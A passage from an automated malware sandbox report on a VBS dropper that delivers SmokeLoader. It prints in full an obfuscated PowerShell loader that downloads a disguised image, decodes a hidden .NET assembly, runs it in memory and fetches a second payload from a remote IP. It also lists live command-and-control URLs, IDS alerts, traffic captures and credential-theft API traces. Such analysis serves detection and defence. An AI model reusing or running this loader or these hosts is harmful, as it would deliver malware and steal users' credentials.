$unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen

            Data Obfuscation

            barindex
            Sigma detected: Powershell download and load assembly
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-09T08:02:45.418836+010020391031A Network Trojan was detected192.168.2.74991346.173.214.1480TCP
            2025-01-09T08:02:50.795369+010020391031A Network Trojan was detected192.168.2.74994246.173.214.1480TCP
            2025-01-09T08:04:02.534429+010020391031A Network Trojan was detected192.168.2.74998746.173.214.1480TCP
            2025-01-09T08:04:04.159872+010020391031A Network Trojan was detected192.168.2.74998846.173.214.1480TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-09T08:02:45.689594+010028298482Potentially Bad Traffic46.173.214.1480192.168.2.749913TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://prolinice.ga/index.phpAvira URL Cloud: Label: malware
            Source: http://vilendar.ga/index.phpAvira URL Cloud: Label: malware
            Source: http://192.3.27.144/250/evenmegoodfor.txtAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
            Multi AV Scanner detection for submitted file
            Source: sweetnessgoodforgreatnessthingswithgood.tIF.vbsReversingLabs: Detection: 15%
            Source: sweetnessgoodforgreatnessthingswithgood.tIF.vbsVirustotal: Detection: 13%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A03098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,14_2_00A03098
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A03717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,14_2_00A03717
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A03E04 RtlCompareMemory,CryptUnprotectData,14_2_00A03E04
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A01198 CryptBinaryToStringA,CryptBinaryToStringA,14_2_00A01198
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A011E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,14_2_00A011E1
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A0123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,14_2_00A0123B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A01FCE CryptUnprotectData,RtlMoveMemory,14_2_00A01FCE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_008026AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,17_2_008026AC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0016178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,18_2_0016178C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0016118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,18_2_0016118D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_00862404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,20_2_00862404
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_0086245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,20_2_0086245E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_0086263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,20_2_0086263E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_001B2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,26_2_001B2799
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_001B25A4 CryptBinaryToStringA,CryptBinaryToStringA,26_2_001B25A4
            Source: Binary string: aspnet_compiler.pdb source: uahuajd, 0000000D.00000000.1710544109.00000000000F2000.00000002.00000001.01000000.00000007.sdmp, uahuajd.12.dr
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A02B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,14_2_00A02B15
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A01D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,14_2_00A01D4A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A03ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,14_2_00A03ED9
            Source: C:\Windows\explorer.exeCode function: 16_2_009B30A8 FindFirstFileW,FindNextFileW,FindClose,16_2_009B30A8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0080255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,17_2_0080255C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_001615BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,18_2_001615BE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_001614D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,18_2_001614D8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_001613FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,18_2_001613FE
            Source: C:\Windows\explorer.exeCode function: 19_2_009E1EB4 FindFirstFileW,FindNextFileW,FindClose,19_2_009E1EB4
            Source: C:\Windows\explorer.exeCode function: 19_2_009E1DB0 FindFirstFileW,FindNextFileW,FindClose,19_2_009E1DB0
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49913 -> 46.173.214.14:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49942 -> 46.173.214.14:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49987 -> 46.173.214.14:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49988 -> 46.173.214.14:80
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 46.173.214.14 80Jump to behavior
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://prolinice.ga/index.php
            Source: Malware configuration extractorURLs: http://vilendar.ga/index.php
            Source: global trafficHTTP traffic detected: GET /250/evenmegoodfor.txt HTTP/1.1Host: 192.3.27.144Connection: Keep-Alive
            Source: Joe Sandbox ViewASN Name: GARANT-PARK-INTERNETRU GARANT-PARK-INTERNETRU
            Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 46.173.214.14:80 -> 192.168.2.7:49913
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xeoxlfalojah.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: prolinice.ga
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: prolinice.ga
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gsfmhaothvg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: prolinice.ga
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yilwfgipaws.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: prolinice.ga
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /250/evenmegoodfor.txt HTTP/1.1Host: 192.3.27.144Connection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
            Source: global trafficDNS traffic detected: DNS query: prolinice.ga
            Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xeoxlfalojah.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: prolinice.ga
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:02:45 GMTServer: Apache/2.4.59 (Debian)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 64 35 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59 ea 90 d6 8f 1b 32 75 08 c5 9a 2d a0 6a 8b fd 6b c4 c2 37 35 48 bd 8c 96 77 e4 62 45 8d 49 72 d0 11 c5 42 47 60 cf 79 cc d5 44 76 86 c6 57 e5 fc f1 b9 98 00 52
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:02:50 GMTServer: Apache/2.4.59 (Debian)Content-Length: 409Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:04:02 GMTServer: Apache/2.4.59 (Debian)Content-Length: 115Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 6f 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f Data Ascii: o_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJ
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:04:03 GMTServer: Apache/2.4.59 (Debian)Content-Length: 115Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 6f 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f Data Ascii: o_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJ
            Source: explorer.exe, 0000000C.00000000.1504447706.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1506729663.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: explorer.exe, 0000000C.00000000.1504447706.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1506729663.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: explorer.exe, 0000000C.00000000.1504447706.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1506729663.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: explorer.exe, 0000000C.00000000.1504447706.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1506729663.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: powershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 0000000E.00000002.1757266577.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.1757266577.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.1757266577.0000000000D3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/
            Source: explorer.exe, 0000000E.00000002.1757266577.0000000000D26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/O
            Source: explorer.exe, 0000000E.00000002.1757266577.0000000000D3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
            Source: explorer.exe, 0000000E.00000002.1757266577.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.1757266577.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.1730709154.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.1746568361.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2525393447.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.1941068248.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2524671592.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2524396685.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2524911167.0000000000628000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2524250168.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.php
            Source: explorer.exe, 0000000E.00000002.1757266577.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.1730709154.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.1746568361.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2525393447.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.1941068248.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2524671592.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2524396685.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2524911167.0000000000628000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2524250168.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 